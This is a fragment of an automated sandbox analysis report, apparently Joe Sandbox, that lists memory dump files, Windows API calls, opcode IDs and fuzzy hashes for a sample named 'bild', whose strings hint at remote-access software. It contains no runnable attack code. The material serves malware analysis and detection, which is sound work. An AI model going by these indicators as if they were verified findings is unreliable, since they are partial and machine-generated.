                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LibraryLoad
                                                                                                              • String ID: nslsp.dll
                                                                                                              • API String ID: 1029625771-3933918195
                                                                                                              • Opcode ID: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                                              • Instruction ID: 60eb6736f29bf142f24d4cfcc231741db50fe0cc1946b431100be770a733e412
                                                                                                              • Opcode Fuzzy Hash: 09252c17772e29db9c623e4f38910c48fc62fdaa09ce42d8982732414e450a92
                                                                                                              • Instruction Fuzzy Hash: E7C092B17152388FE3685F7CAC085D2FAE4EB48A91351986EE4B5D3308E6B09C40CFE4
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 11074E1F
                                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11194245,?), ref: 11074E89
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 1654520187-0
                                                                                                              • Opcode ID: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                                              • Instruction ID: 144a06a128bfe4de4bcaa8ee3b5ec3a734aa963de7831f9780c3e5d6e94517af
                                                                                                              • Opcode Fuzzy Hash: f6776980cd6796a903c6ab2b2bc3f730c5ac8cd4990655cc289426affdaed8f3
                                                                                                              • Instruction Fuzzy Hash: 6E218376D04228A7D710DA99EC41FEFFBACEB44325F4045AAE909D7200D7315A55CBE1
                                                                                                              APIs
                                                                                                                • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                              • std::exception::exception.LIBCMT ref: 1105FD93
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 1105FDA8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 1338273076-0
                                                                                                              • Opcode ID: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                                              • Instruction ID: 65be3d9b06008521879bde957bfb15225efad016ffb254945ac63f30ffb56918
                                                                                                              • Opcode Fuzzy Hash: 008f8e93dd07e0136ec59ea579b5f73905d9fad81b76f295f420d5e427868693
                                                                                                              • Instruction Fuzzy Hash: F5117FBA900619ABC710CF99C940ADAF7F8FB48614F10862EE91997740E774B900CBE1
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: _malloc_memmove
                                                                                                              • String ID:
                                                                                                              • API String ID: 1183979061-0
                                                                                                              • Opcode ID: 6759e9627eb897b24cf992b2bdc0114f61227cb54e7c028b4573e7a9add283cd
                                                                                                              • Instruction ID: db33143030e4a9298ca15ccbefe9b49d771c33472961b073c023ff9ae0ea679a
                                                                                                              • Opcode Fuzzy Hash: 6759e9627eb897b24cf992b2bdc0114f61227cb54e7c028b4573e7a9add283cd
                                                                                                              • Instruction Fuzzy Hash: 98F0F47AE002666F9741CF2C9844896FBDCDF8A158314C4A2E999CB301D671EC0687E0
                                                                                                              APIs
                                                                                                              • _memset.LIBCMT ref: 110883EF
                                                                                                              • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070993,00000000,00000000,1118201E,000000FF), ref: 11088460
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalInitializeSection_memset
                                                                                                              • String ID:
                                                                                                              • API String ID: 453477542-0
                                                                                                              • Opcode ID: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                                              • Instruction ID: 54b2584c526ac61f8aa3306390e259e673957fd90be6398fea32980b523eb801
                                                                                                              • Opcode Fuzzy Hash: 26224d68f3b9d4a1246f00074b5df241b75f7fb3c3b45871788fd623fb5031c3
                                                                                                              • Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
                                                                                                              APIs
                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                                              • ExtractIconExA.SHELL32(?,00000000,0003049B,00030473,00000001), ref: 11144498
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExtractFileIconModuleName
                                                                                                              • String ID:
                                                                                                              • API String ID: 3911389742-0
                                                                                                              • Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                                              • Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
                                                                                                              • Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                                              • Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
                                                                                                              APIs
                                                                                                                • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                                              • __lock_file.LIBCMT ref: 11163DFE
                                                                                                                • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                                              • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                              • String ID:
                                                                                                              • API String ID: 2800547568-0
                                                                                                              • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                                              • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                                              • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                                              • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 6C7A6C26
                                                                                                              • Sleep.KERNEL32(00000064), ref: 6C7A6C5B
                                                                                                                • Part of subcall function 6C7A6940: GetTickCount.KERNEL32 ref: 6C7A6950
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CountTick$Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 4250438611-0
                                                                                                              • Opcode ID: fa98ec120934edc8494c377dd1d6914534b18654274f679dabed8ba3adc0eae5
                                                                                                              • Instruction ID: eabbbe627338eed9653bd0a523d26c9f44ceda5cf6b3b1d334e235638b19081e
                                                                                                              • Opcode Fuzzy Hash: fa98ec120934edc8494c377dd1d6914534b18654274f679dabed8ba3adc0eae5
                                                                                                              • Instruction Fuzzy Hash: F9F05E32740104AECF14EFB9974C358B7B1EBA2359F15027AD412DAE80EB747A85C702
                                                                                                              APIs
                                                                                                              • WSACancelBlockingCall.WSOCK32 ref: 6C7963A9
                                                                                                              • Sleep.KERNEL32(00000032), ref: 6C7963B3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180719718.000000006C791000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C790000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180699601.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180753976.000000006C7D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180775211.000000006C7D9000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DA000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180794419.000000006C7DE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180831579.000000006C7E0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_6c790000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: BlockingCallCancelSleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3706969569-0
                                                                                                              • Opcode ID: 6818fe003b4ae3e2de737487e8975bb1a824f141bc677090715014ee23cf878f
                                                                                                              • Instruction ID: b03d7ab8b7365c7349011c7d0542eb59a80e9c8db0a0598d6cc84b750ded33dd
                                                                                                              • Opcode Fuzzy Hash: 6818fe003b4ae3e2de737487e8975bb1a824f141bc677090715014ee23cf878f
                                                                                                              • Instruction Fuzzy Hash: A5B092703A21506AAB8017711B0E2AA24980F8528BF6015706A41C8989EF20C204A0A1
                                                                                                              APIs
                                                                                                                • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                                                • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                                              • GetLastError.KERNEL32(?,0276B878,000000FF,?), ref: 11144ED5
                                                                                                              • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0276B878,000000FF,?), ref: 11144EE5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3768737497-0
                                                                                                              • Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                                              • Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
                                                                                                              • Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                                              • Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3
                                                                                                              APIs
                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: LockitLockit::_std::_
                                                                                                              • String ID:
                                                                                                              • API String ID: 3382485803-0
                                                                                                              • Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                                              • Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
                                                                                                              • Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                                              • Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90
                                                                                                              APIs
                                                                                                              • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: QueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3660427363-0
                                                                                                              • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                                              • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                                              • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                                              • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                                              APIs
